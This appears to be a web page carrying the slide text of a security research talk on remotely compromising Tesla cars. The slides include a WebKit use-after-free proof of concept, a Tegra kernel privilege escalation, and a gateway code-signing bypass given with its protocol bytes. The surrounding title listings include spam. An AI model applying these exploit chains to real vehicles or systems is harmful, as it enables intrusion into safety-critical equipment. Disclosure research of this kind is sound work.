Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shells
 
SMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgiSMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgi
 
Windows内核技术介绍
Windows内核技术介绍Windows内核技术介绍
Windows内核技术介绍
 
CGI.ppt
CGI.pptCGI.ppt
CGI.ppt
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eve
 
Demystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchIDDemystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchID
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
 
Java Jit. Compilation and optimization by Andrey Kovalenko
Java Jit. Compilation and optimization by Andrey KovalenkoJava Jit. Compilation and optimization by Andrey Kovalenko
Java Jit. Compilation and optimization by Andrey Kovalenko
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agent
 
Introduction to Titanium and how to connect with a PHP backend
Introduction to Titanium and how to connect with a PHP backendIntroduction to Titanium and how to connect with a PHP backend
Introduction to Titanium and how to connect with a PHP backend
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure Enclave
 
E yantra robot abstractions
E yantra robot abstractionsE yantra robot abstractions
E yantra robot abstractions
 
IOT Firmware: Best Pratices
IOT Firmware: Best PraticesIOT Firmware: Best Pratices
IOT Firmware: Best Pratices
 
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsCONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Recently uploaded (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars

  • 1. How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars
  • 2. • Tencent Keen Security Lab • Researchers in KeenLab who are focusing on the research of connected cars.
  • 3. 1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Easter Egg
  • 4. • User-Agent • Mozilla/5.0 (X11; Linux) AppleWebKit/534.34 (KHTML, like Gecko) QtCarBrowser Safari/534.34 • Webkit 534.34: 2016, 2017 • Webkit 601.1 : 2018
  • 5. <!DOCTYPE html> <script> if (window.testRunner) testRunner.dumpAsText(); function eventhandler1() { var transformList = document.createElementNS("http://www.w3.org/2000/svg", "radialGradient").gradientTransform.baseVal; var transform = document.querySelector("svg").createSVGTransform(); transformList.appendItem(transform); var matrix = transform.matrix; transformList.initialize(transform); matrix.flipX(); } </script> This test passes if it doesn't crash under ASAN. <svg onload="eventhandler1()">
  • 6. <!DOCTYPE html> <script> if (window.testRunner) testRunner.dumpAsText(); function eventhandler1() { var transformList = document.createElementNS("http://www.w3.org/2000/svg", "radialGradient").gradientTransform.baseVal; var transform = document.querySelector("svg").createSVGTransform(); transformList.appendItem(transform); var matrix = transform.matrix; transformList.initialize(transform); matrix.flipX(); } </script> This test passes if it doesn't crash under ASAN. <svg onload="eventhandler1()"> 1. Memory allocated 2. Memory freed 3. Used again
  • 7. • Allocate transformList.appendItem(transform); • Free transformList.initialize(transform); WebCore::SVGListProperty<WebCore::SVGTransformList>::appendItemValuesAndWrappers() { … PropertyType& values = animatedList->values(); // Append the value and wrapper at the end of the list. values.append(newItem->propertyReference()); } WebCore::SVGListProperty<WebCore::SVGTransformList>::initializeValuesAndWrappers() { ... PropertyType& values = animatedList->values(); values.clear(); values.append(newItem->propertyReference()); }
  • 8. • A better way to Free transformList.clear(); • Use after free matrix.flipX(); WebCore::SVGListProperty<WebCore::SVGTransformList>::clearValuesAndWrappers() { ... animatedList->values().clear(); } SVGMatrix flipX() { AffineTransform copy = *this; copy.flipX(); return static_cast<SVGMatrix>(copy); }
  • 9. • Allocate transformList.appendItem(transform); • 1024 bytes • Use after free matrix.flipX(); SVGTransform SVGTransform SVGMatrix SVGMatrix
  • 10. • Leak heap address m_allocBase leaked = matrix.a • Arbitrary address free matrix.a = u2d(address) array.unshift(0)
  • 11. • Arbitrary address read • Construct a fake String in Array • Arbitrary address write • fastFree() the header of Uint32Array • Define a new Uint32Array(6) to construct a fake header JSValue Fake JSC::StringObject Fake JSC::JSString Fake WTF::StringImpl UAF
  • 12. • Old kernel • New kernel • Protection • PXN/PAN Emulation Enabled CONFIG_CPU_SW_DOMAIN_PAN=y • dmesg restriction CONFIG_SECURITY_DMESG_RESTRICT=y • NO KASLR
  • 13.
  • 14. • Memory manager for Tegra GPU. •ioctl() •NVMAP_IOC_CREATE •NVMAP_IOC_ALLOC •NVMAP_IOC_FREE •NVMAP_IOC_MMAP •NVMAP_IOC_PIN_MULT •…
  • 15. • copy structure nvmap_pin_handle from user memory to kernel memory struct nvmap_pin_handle { unsigned long handles; /* array of handles to pin/unpin */ unsigned long addr; /* array of addresses to return */ __u32 count; /* number of entries in handles */ }; handles addr count …
  • 16. • Process every nvmap_handle structure in array handles • Root Cause int nvmap_pin_ids(struct nvmap_client *client, unsigned int nr, const unsigned long *ids) { for (i = 0; i < nr && !ret; i++) { ref = _nvmap_validate_id_locked(client, ids[i]); if (ref) { ... } else { … verify = nvmap_validate_get(client, ids[i]); if (verify) ... else ret = -EPERM; nvmap_ref_lock(client); } } nr = i; validate …
  • 17. • Trigger the vulnerability int nvmap_pin_ids(struct nvmap_client *client, unsigned int nr, const unsigned long *ids) { ... if (ret) goto out; ... out: if (ret) { nvmap_ref_lock(client); ... for (i = 0; i < nr; i++) nvmap_handle_put(h[i]); } return ret; }
  • 18. • Arbitrary address decrease by one • nvmap_handle static inline void nvmap_handle_put(struct nvmap_handle *h) { int cnt = atomic_dec_return(&h->ref); if (WARN_ON(cnt < 0)) { pr_err("%s: %s put to negative referencesn", __func__, current->comm); } else if (cnt == 0) _nvmap_handle_free(h); } node ref pin … … … … ... … …
  • 19. • Hijack $PC Syscall table … sys_accept4 – 0x10 … -0x10
  • 20. • JOP gadgets on v8.1(17.24.28) • Read memory • Write memory • Write • syscall(SYS_ACCEPT4, 0, target_address – gadget_address, half_value, gadget_address, 0, 0, RET_FAST_SYSCALL);
  • 21. • Bypass AppArmor • Patch aa_g_profile_mode with APPARMOR_COMPLAIN • Get root • Patch setresuid()
  • 22. 1. 2. 3. 4. 5. Root APE from CID OTA Overview Easter Egg Hack into CID
  • 23. • Update software will be load from the SD Card. • Filename is “boot.img” • Files on SD Card are transferred via Ethernet. • No signature/cert applied. Only do checksum on the file. • ➔ Upload modified software directly, and reboot to run
  • 24. • Updater’s signature check is applied • Until last 0x48 bytes • SHA512 + ed25519
  • 25. • Updater’s signature check is applied • Until last 0x48 bytes • SHA512 + ed25519 • Cryptographic attack? • Constants seems carefully picked, • Let’s check its implementation ;) • How the updater written to the SD card • How the updater gets executd
  • 26. • File operate agent using typical TLV-style encoding scheme • For read file • And for rename uint16_t len(Data) Command Data Len Command Filename 0x000A 0x00 “file.imgx00” Len Command Filename NewName 0x13 0x02 “file.imgx00” “used.imgx00”
  • 27. • In last year’s slide, we said “boot.img” is the updater, and:
  • 28. • In last year’s slides, we said upload the updater directly is forbidden. • Upload “boot.img” is rejected here:
  • 29. • In last year’s slides, we said upload the update software directly is not allowed. • Actually, upload and then rename it to “boot.img” is also disallowed. • Transferring the “boot.img” should be finished by the diagnostic agent.
  • 30. • Diagnostic agent have a similar protocol with fixed length (0x20). • The related command is REBOOT_FOR_UPDATE(0x08). Command (uint8_t) Filename 0x08 “noboot.imgx00”
  • 31. • Diagnostic agent have a similar protocol with fixed length (0x20). • The related command is REBOOT_FOR_UPDATE(0x08). • It will verify the file and its signature, and rename if correct.
  • 32. File Agent SD Card File Agent SD Card Diag Agent Diag Agent NO YES Write File boot.img 1. Write File noboot.img 2. Verify File noboot.img 3. Rename
  • 33. • When RESET is triggered, bootloader will be executed first • It would check if “boot.img” with a correct checksum exists in the SD card and try to boot it
  • 34. • When RESET is triggered, bootloader will be executed first • It would check if “boot.img” with a correct checksum exists in the SD card and try to boot it • Bootloader will NOT check the signature, in neither v1 or v2 • Update bootloader is dangerous, since it may cause a bricked car • And without chip-level secure boot, update the bootloader is useless, since gateway code itself might also have vulns • TL;DR: we can always gain access again if a “boot.img” can be put into the SD card ;)
  • 35. • Tesla is using FatFS r0.09 • Written by ChaN, and default config is nearly not changed • Before FatFS write the new name to the chunk: So would have the same effect with And gateway simply uses “strcmp” ☺ for(si =0; lfn[si]==' '|| lfn[si]=='.'; si++); /* Strip leading spaces and dots */ fatfs_rename("a.img", "x20b.img"); fatfs_rename("a.img", "b.img");
  • 36. • Upload a malicious update software • And rename it • And reboot directly Len Command Filename 0x000C 0x01 “badupd.imgx00” Len Command Filename NewName 0x16 0x02 “badupd.imgx00” “x20boot.imgx00” Command (uint8_t) Padding 0x00 “x00”*32
  • 38. 1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection Easter Egg Hack into CID
  • 39.
  • 40.
  • 41. • “Firmware Bundle” • A large file contains anything required to do a fresh upgrade on a Model S/X car. • Encrypted • Some modules used during deploy • Message box • CDN • Job management
  • 42. • Some modules used during deploy • Message box • CDN • Job management • Each message contains a command • Firmware update can be triggered by new message in the message box • QtCar would peek unread messages actively
  • 43.
  • 44.
  • 45. • Job management is a key part for OTA • Assign job ID for tracking each upgrade request • Preset checkpoints in key steps for diagnostic • POST name of the checkpoint to remote server • Engineers might set up this with a complex telemetry infrastructure for quick responding to failures
  • 46.
  • 47. • Each ECU with Ethernet connected have a upgrade agent • ic-updater, cid-updater, … • Nearly same framework • CID is getting the firmware and distribute it over the car • Consider cid-updater as local server, and ic-updater as remote agent • Both of them running a service command_service_listener • Local server may get remote agent if necessary • How other components upgraded? • Take IC as a example
  • 48.
  • 49.
  • 50. • For IC: • New update • Go staged • Update verified • Staging • Write firmware into B part • Staged & inactive • Reboot • Active
  • 51.
  • 52. • ECUs like BCCEN would be connected to the gateway • What we have mentioned before: • Flashing those ECUs are performed by “boot.img” • Firmwares used by updater in “release.tgz” • Updater mode is selected by “*.upd” • Now we would introduce how those files are picked
  • 53. • All firmware exists in folder deploy/seed_artifacts_v2 of the bundle • Important files: • Boot.img : Updater • Release_version.txt: Firmware version • Version_map2.tsv and Signed_metadata_map.tsv: Firmware info • Internal_option_defaults.tsv: Firmware default config • Folders, named by ECU name, like esp/, gtw/, etc. • ECUName/ProviderID/ECUFwName.hex. For example: • GTW/1/gatewayfw.hex
  • 54. • *.tsv files would follow this pattern: • Signature field is added after our previous bug report • For example Version hash ECUName:Provide rID Path to firmware New name Component name Checksum Requirement s Signature ……
  • 55. • Pick firmwares: • Performed by cid-updater • Get car configuration and ECU configuration • Compare with values in *.tsv • Pack into release.tar.gz • Create correct *.upd file • Transfer all those files • Reboot_for_update
  • 56.
  • 57. 1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Hack into CID
  • 58. • What is Easter egg? • A music show for Model X
  • 60. • Stage 1 : Triggers on CID • Stage 2 : Start on BCCEN • Stage 3 : Easter Egg start
  • 61. • After long press of “T” button on CID CID Gateway BD-CANUDP ETH 0x2680x21e
  • 62. CID Gateway 0x2310x433 UDP ETH BD-CAN BCCEN Fob Signal
  • 63. • BCCEN 0x231 BCCEN Fob Signal 433Mhz Fob Signal BLE BD-CAN
  • 64. • All the ECUs will follow the sync signal in BCFRONT CID GatewayUDP ETH BCFRONT BD-CAN BCREAR BCCEN ………
  • 66. • All the ECUs will follow the sync signal in BCFRONT Door Control Module RF ECU ECU Function BCFDM Door Control Module LF BCRDM Door Control Module LR BCFPM Door Control Module RF BCRPM Door Control Module RR BCCEN Central Body Control Module BCREAR Rear Body Control Module BCFRONT Front Body Control Module BCFALCD Falcon Controller Front BCFALCP Falcon Controller Rear
  • 67. • Patch in CID • Reverse of ECUs • Patch in ECUs
  • 68. • Patch the QtCar to simulate the press • Bypass the code and time checking
  • 69. • All body control ECUs are powerpc • Identify the RTOS • Found out the segment table
  • 70. • Beginning of the initialization Segment Table Source Target follow follow copy
  • 71. • Segments struct egg_table_action { DWORD sour_addr; DWORD target_addr; DWORD length; };
  • 72. • Locate the code to check the fob status • sub_3520A • sub_36106 check the status of fob
  • 73. • Locate the data of the Egg table with segment table • The size of BCCEN firmware is large than before • Patch the size of Egg table struct egg_table_action { BYTE type; /* 0:light, 1:Wing door, 2:regular door… DWORD conf; /* actions */ DWORD time; /* time in ms */ };
  • 74. 1. 2. 3. 4. 5. Bypass Code Signing Protection OTA Overview Easter Egg Hack into CID
  • 75. • Provides driver assistance function CID 192.168.90.100 APE 192.168.90.103 Other 192.168.90.* Gateway 192.168.90.102 IC 192.168.90.101
  • 76. • TCP port 25974 • Command • TCP port 28496 • http server • commnad via http request
  • 77. • handshake • install • install http://va.teslamotors.com:80/xxxxx handshake JSON
